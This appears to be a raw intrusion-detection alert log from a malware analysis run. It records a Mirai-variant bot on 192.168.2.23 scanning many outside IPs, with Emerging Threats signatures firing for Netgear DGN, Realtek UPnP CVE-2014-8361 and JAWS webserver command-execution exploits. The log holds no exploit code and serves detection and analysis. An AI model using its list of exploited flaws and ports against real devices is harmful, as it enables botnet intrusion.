                                                                        2024-12-06T00:37:05.925079+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332856191.77.140.15380TCP
                                                                        2024-12-06T00:37:05.925449+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234185498.125.56.2085555TCP
                                                                        2024-12-06T00:37:05.925819+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353304182.227.110.2880TCP
                                                                        2024-12-06T00:37:05.926567+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332996101.15.65.845555TCP
                                                                        2024-12-06T00:37:05.927676+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2356482133.9.23.2180TCP
                                                                        2024-12-06T00:37:05.928048+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233917619.149.226.1785555TCP
                                                                        2024-12-06T00:37:05.928420+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234189613.194.80.1898080TCP
                                                                        2024-12-06T00:37:05.929157+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2353488202.88.157.16552869TCP
                                                                        2024-12-06T00:37:05.929527+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343486157.231.213.11280TCP
                                                                        2024-12-06T00:37:05.929527+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343486157.231.213.11280TCP
                                                                        2024-12-06T00:37:05.931772+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235432424.168.121.680TCP
                                                                        2024-12-06T00:37:05.931772+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235432424.168.121.680TCP
                                                                        2024-12-06T00:37:05.932143+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349894112.194.38.6380TCP
                                                                        2024-12-06T00:37:05.932143+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349894112.194.38.6380TCP
                                                                        2024-12-06T00:37:05.932516+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233286011.48.182.38080TCP
                                                                        2024-12-06T00:37:05.934759+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349890152.96.212.20880TCP
                                                                        2024-12-06T00:37:05.936456+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351940144.80.221.22280TCP
                                                                        2024-12-06T00:37:05.938150+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233497034.86.117.215555TCP
                                                                        2024-12-06T00:37:05.941512+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235365448.137.212.428080TCP
                                                                        2024-12-06T00:37:05.942271+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354388177.141.44.23149152TCP
                                                                        2024-12-06T00:37:05.943403+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2351362210.92.63.9080TCP
                                                                        2024-12-06T00:37:05.943765+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2350600125.230.87.13880TCP
                                                                        2024-12-06T00:37:05.944225+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2333120106.23.130.14052869TCP
                                                                        2024-12-06T00:37:05.944605+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337312186.93.85.1887574TCP
                                                                        2024-12-06T00:37:05.944982+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353778162.60.224.628080TCP
                                                                        2024-12-06T00:37:06.933937+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233291615.252.209.17880TCP
                                                                        2024-12-06T00:37:06.933937+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233291615.252.209.17880TCP
                                                                        2024-12-06T00:37:06.934639+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340718178.72.204.449152TCP
                                                                        2024-12-06T00:37:06.935385+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235807896.81.159.23649152TCP
                                                                        2024-12-06T00:37:06.936116+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235022881.210.236.23880TCP
                                                                        2024-12-06T00:37:06.936852+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233740858.25.214.11949152TCP
                                                                        2024-12-06T00:37:06.937220+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235388261.221.193.11580TCP
                                                                        2024-12-06T00:37:06.938346+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2349044173.224.150.11752869TCP
                                                                        2024-12-06T00:37:06.938698+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235804676.231.140.11580TCP
                                                                        2024-12-06T00:37:06.939059+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2350262202.51.201.3780TCP
                                                                        2024-12-06T00:37:06.939435+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333202153.157.254.308080TCP
                                                                        2024-12-06T00:37:06.939798+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235902025.40.34.745555TCP
                                                                        2024-12-06T00:37:06.940164+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234575819.251.187.1577574TCP
                                                                        2024-12-06T00:37:06.940531+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234492275.14.247.307574TCP
                                                                        2024-12-06T00:37:06.940902+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233446841.43.78.10452869TCP
                                                                        2024-12-06T00:37:06.941648+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344338189.229.175.1228080TCP
                                                                        2024-12-06T00:37:06.942011+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355692182.149.46.380TCP
                                                                        2024-12-06T00:37:06.942376+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334086215.189.147.1008080TCP
                                                                        2024-12-06T00:37:06.942765+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359254130.123.72.2257574TCP
                                                                        2024-12-06T00:37:06.943117+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234935471.164.37.2128080TCP
                                                                        2024-12-06T00:37:06.943882+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233787670.159.0.17280TCP
                                                                        2024-12-06T00:37:06.945347+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2357396132.109.208.1038080TCP
                                                                        2024-12-06T00:37:06.945724+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2339304181.25.123.2358080TCP
                                                                        2024-12-06T00:37:06.947566+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234943441.161.214.1925555TCP
                                                                        2024-12-06T00:37:07.887402+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234674866.99.16.4049152TCP
                                                                        2024-12-06T00:37:07.973066+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233498247.104.135.11780TCP
                                                                        2024-12-06T00:37:07.973066+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233498247.104.135.11780TCP
                                                                        2024-12-06T00:37:08.450524+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235336894.23.166.657574TCP
                                                                        2024-12-06T00:37:08.470526+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2351418177.37.167.9552869TCP
                                                                        2024-12-06T00:37:08.674491+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351374193.34.214.5380TCP
                                                                        2024-12-06T00:37:08.674491+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351374193.34.214.5380TCP
                                                                        2024-12-06T00:37:08.990363+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359994220.129.74.2048080TCP
                                                                        2024-12-06T00:37:09.054386+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23462801.9.37.180TCP
                                                                        2024-12-06T00:37:09.928674+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348762138.35.154.4680TCP
                                                                        2024-12-06T00:37:10.110221+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357340163.191.18.2355555TCP
                                                                        2024-12-06T00:37:16.839948+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235319423.202.41.21149152TCP
                                                                        2024-12-06T00:37:16.840695+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338750118.151.114.805555TCP
                                                                        2024-12-06T00:37:16.849127+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332884116.175.89.2649152TCP
                                                                        2024-12-06T00:37:16.850116+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235589885.52.221.21852869TCP
                                                                        2024-12-06T00:37:16.850838+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355846116.48.214.19749152TCP
                                                                        2024-12-06T00:37:16.851214+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234614250.129.165.88080TCP
                                                                        2024-12-06T00:37:16.851566+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2335422185.249.96.8052869TCP
                                                                        2024-12-06T00:37:16.851942+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343258183.178.42.19180TCP
                                                                        2024-12-06T00:37:16.852293+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360098102.60.227.13880TCP
                                                                        2024-12-06T00:37:16.852293+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360098102.60.227.13880TCP
                                                                        2024-12-06T00:37:16.853071+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233810450.210.105.428080TCP
                                                                        2024-12-06T00:37:16.854112+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356086204.30.144.17480TCP
                                                                        2024-12-06T00:37:16.854112+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356086204.30.144.17480TCP
                                                                        2024-12-06T00:37:16.855204+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343718215.101.251.2055555TCP
                                                                        2024-12-06T00:37:16.855611+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2340404139.210.155.19280TCP
                                                                        2024-12-06T00:37:16.856293+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233744094.177.142.16152869TCP
                                                                        2024-12-06T00:37:16.856649+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234811833.72.49.858080TCP
                                                                        2024-12-06T00:37:16.857051+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2336152175.171.246.25080TCP
                                                                        2024-12-06T00:37:16.857388+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352294197.68.216.10980TCP
                                                                        2024-12-06T00:37:16.857763+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2337144157.232.42.1418080TCP
                                                                        2024-12-06T00:37:16.858105+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235165848.181.195.148080TCP
                                                                        2024-12-06T00:37:16.858479+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235593484.119.107.11880TCP
                                                                        2024-12-06T00:37:16.858479+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235593484.119.107.11880TCP
                                                                        2024-12-06T00:37:16.858836+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2360274101.203.94.12652869TCP
                                                                        2024-12-06T00:37:16.859199+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333500140.24.155.938080TCP
                                                                        2024-12-06T00:37:16.859991+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348514109.3.50.608080TCP
                                                                        2024-12-06T00:37:16.860309+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233648264.132.168.648080TCP
                                                                        2024-12-06T00:37:16.861021+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233467215.208.50.25080TCP
                                                                        2024-12-06T00:37:16.861747+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234352069.249.109.1775555TCP
                                                                        2024-12-06T00:37:16.862114+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345952107.108.113.1077574TCP
                                                                        2024-12-06T00:37:16.863570+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23496582.144.236.2175555TCP
                                                                        2024-12-06T00:37:16.864403+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233445618.5.160.1847574TCP
                                                                        2024-12-06T00:37:16.865022+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339076216.224.95.807574TCP
                                                                        2024-12-06T00:37:16.865754+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234146040.156.170.13252869TCP
                                                                        2024-12-06T00:37:16.866131+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342800196.223.36.1728080TCP
                                                                        2024-12-06T00:37:16.866846+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2353162140.22.65.768080TCP
                                                                        2024-12-06T00:37:16.867571+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234243494.215.141.548080TCP
                                                                        2024-12-06T00:37:16.867926+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233437478.132.73.22480TCP
                                                                        2024-12-06T00:37:16.868306+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2355920128.91.58.452869TCP
                                                                        2024-12-06T00:37:16.868666+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344886173.106.78.3580TCP
                                                                        2024-12-06T00:37:16.869780+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235987226.69.100.317574TCP
                                                                        2024-12-06T00:37:16.870105+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236040039.227.72.15580TCP
                                                                        2024-12-06T00:37:16.870105+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236040039.227.72.15580TCP
                                                                        2024-12-06T00:37:16.870470+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234578660.220.129.515555TCP
                                                                        2024-12-06T00:37:16.871244+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233755620.164.209.9949152TCP
                                                                        2024-12-06T00:37:16.871563+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2357842196.158.249.16880TCP
                                                                        2024-12-06T00:37:16.871959+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355668156.158.132.22180TCP
                                                                        2024-12-06T00:37:16.872317+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23537209.23.74.6480TCP
                                                                        2024-12-06T00:37:16.872658+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233510216.102.200.1395555TCP
                                                                        2024-12-06T00:37:16.875492+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234934478.126.194.17980TCP
                                                                        2024-12-06T00:37:16.875492+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234934478.126.194.17980TCP
                                                                        2024-12-06T00:37:16.876219+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360798112.153.207.1158080TCP
                                                                        2024-12-06T00:37:16.876586+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347784168.216.138.1249152TCP
                                                                        2024-12-06T00:37:16.876992+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234051218.179.120.1325555TCP
                                                                        2024-12-06T00:37:16.877300+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359598102.187.77.1948080TCP
                                                                        2024-12-06T00:37:16.877664+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360602121.177.118.15049152TCP
                                                                        2024-12-06T00:37:16.878055+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356896166.196.205.2249152TCP
                                                                        2024-12-06T00:37:16.878392+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236086225.128.176.4849152TCP
                                                                        2024-12-06T00:37:16.879124+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235587056.100.184.7880TCP
                                                                        2024-12-06T00:37:16.879540+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234786086.240.223.1745555TCP
                                                                        2024-12-06T00:37:16.879854+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2354338157.77.71.17752869TCP
                                                                        2024-12-06T00:37:16.880216+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234416659.9.127.1857574TCP
                                                                        2024-12-06T00:37:16.880632+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233450648.133.51.15580TCP
                                                                        2024-12-06T00:37:16.880942+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235186427.76.195.8152869TCP
                                                                        2024-12-06T00:37:16.881316+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342070156.82.219.22380TCP
                                                                        2024-12-06T00:37:16.881316+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342070156.82.219.22380TCP
                                                                        2024-12-06T00:37:16.881679+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340208158.99.48.1697574TCP
                                                                        2024-12-06T00:37:16.882044+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351046129.30.155.1677574TCP
                                                                        2024-12-06T00:37:16.883133+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23557269.174.94.2087574TCP
                                                                        2024-12-06T00:37:16.883504+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337098138.112.67.10080TCP
                                                                        2024-12-06T00:37:16.883931+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23463385.66.245.14780TCP
                                                                        2024-12-06T00:37:16.883931+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23463385.66.245.14780TCP
                                                                        2024-12-06T00:37:16.884615+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235511664.77.154.21980TCP
                                                                        2024-12-06T00:37:16.884950+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338142209.75.120.19880TCP
                                                                        2024-12-06T00:37:16.885311+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233923299.207.247.23280TCP
                                                                        2024-12-06T00:37:16.885311+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233923299.207.247.23280TCP
                                                                        2024-12-06T00:37:16.886019+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233434027.39.220.12449152TCP
                                                                        2024-12-06T00:37:16.886385+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354212188.84.47.8380TCP
                                                                        2024-12-06T00:37:16.887475+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234567075.46.156.12180TCP
                                                                        2024-12-06T00:37:16.887839+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355346221.232.130.205555TCP
                                                                        2024-12-06T00:37:16.904917+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2357186140.128.108.4052869TCP
                                                                        2024-12-06T00:37:16.905657+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337318132.199.20.2097574TCP
                                                                        2024-12-06T00:37:16.906069+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336252215.153.214.1635555TCP
                                                                        2024-12-06T00:37:16.907135+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235604046.183.211.15880TCP
                                                                        2024-12-06T00:37:16.907135+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235604046.183.211.15880TCP
                                                                        2024-12-06T00:37:16.907896+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353394160.14.3.2185555TCP
                                                                        2024-12-06T00:37:16.908607+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234858045.52.252.7852869TCP
                                                                        2024-12-06T00:37:16.908981+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338304178.16.80.10680TCP
                                                                        2024-12-06T00:37:16.908981+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338304178.16.80.10680TCP
                                                                        2024-12-06T00:37:16.909344+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356476203.102.228.878080TCP
                                                                        2024-12-06T00:37:16.909722+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235058279.22.85.5180TCP
                                                                        2024-12-06T00:37:16.909722+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235058279.22.85.5180TCP
                                                                        2024-12-06T00:37:16.910089+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235562481.101.181.758080TCP
                                                                        2024-12-06T00:37:16.910461+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235769050.184.254.14249152TCP
                                                                        2024-12-06T00:37:16.911217+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234383684.191.42.5580TCP
                                                                        2024-12-06T00:37:16.911580+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343540157.184.128.3549152TCP
                                                                        2024-12-06T00:37:16.911954+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341842184.80.231.1385555TCP
                                                                        2024-12-06T00:37:16.912336+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235837415.46.95.21180TCP
                                                                        2024-12-06T00:37:16.912336+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235837415.46.95.21180TCP
                                                                        2024-12-06T00:37:16.912696+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234792645.104.230.85555TCP
                                                                        2024-12-06T00:37:16.913110+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2342954221.56.144.11752869TCP
                                                                        2024-12-06T00:37:16.913431+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235746622.188.96.9780TCP
                                                                        2024-12-06T00:37:16.913815+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336132207.54.29.7680TCP
                                                                        2024-12-06T00:37:16.914227+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357150149.149.230.2107574TCP
                                                                        2024-12-06T00:37:16.914922+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234653496.99.41.1308080TCP
                                                                        2024-12-06T00:37:16.915296+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2338838191.59.214.13880TCP
                                                                        2024-12-06T00:37:16.916066+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359802189.65.195.1880TCP
                                                                        2024-12-06T00:37:16.916409+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351244111.77.188.1937574TCP
                                                                        2024-12-06T00:37:16.917148+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234579281.139.77.7680TCP
                                                                        2024-12-06T00:37:16.917524+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235635645.108.234.23949152TCP
                                                                        2024-12-06T00:37:16.917895+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234686239.139.249.977574TCP
                                                                        2024-12-06T00:37:16.918625+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340496116.71.38.2165555TCP
                                                                        2024-12-06T00:37:16.919358+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357208103.231.22.138080TCP
                                                                        2024-12-06T00:37:16.919735+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.236076048.117.0.6352869TCP
                                                                        2024-12-06T00:37:16.921207+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2343440202.113.87.11180TCP
                                                                        2024-12-06T00:37:16.921570+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233452489.69.164.2277574TCP
                                                                        2024-12-06T00:37:16.922060+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346350149.81.97.2425555TCP
                                                                        2024-12-06T00:37:16.922309+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360808130.229.101.1977574TCP
                                                                        2024-12-06T00:37:16.923417+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351144181.219.130.18480TCP
                                                                        2024-12-06T00:37:16.923417+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351144181.219.130.18480TCP
                                                                        2024-12-06T00:37:16.923787+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235765430.199.225.1765555TCP
                                                                        2024-12-06T00:37:16.924155+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2359242132.196.243.10480TCP
                                                                        2024-12-06T00:37:16.924565+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234574015.182.220.7080TCP
                                                                        2024-12-06T00:37:16.924565+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234574015.182.220.7080TCP
                                                                        2024-12-06T00:37:16.924908+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350436131.116.99.905555TCP
                                                                        2024-12-06T00:37:16.925642+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233873496.170.47.1078080TCP
                                                                        2024-12-06T00:37:16.926748+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333744158.86.239.378080TCP
                                                                        2024-12-06T00:37:16.927110+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333322125.187.103.2508080TCP
                                                                        2024-12-06T00:37:16.927843+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235840821.134.232.2055555TCP
                                                                        2024-12-06T00:37:16.928584+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233517016.77.80.2548080TCP
                                                                        2024-12-06T00:37:16.928967+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23570328.84.61.3849152TCP
                                                                        2024-12-06T00:37:16.929307+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359014132.49.92.2228080TCP
                                                                        2024-12-06T00:37:16.929690+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234228618.15.162.215555TCP
                                                                        2024-12-06T00:37:16.930048+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345958164.50.155.21080TCP
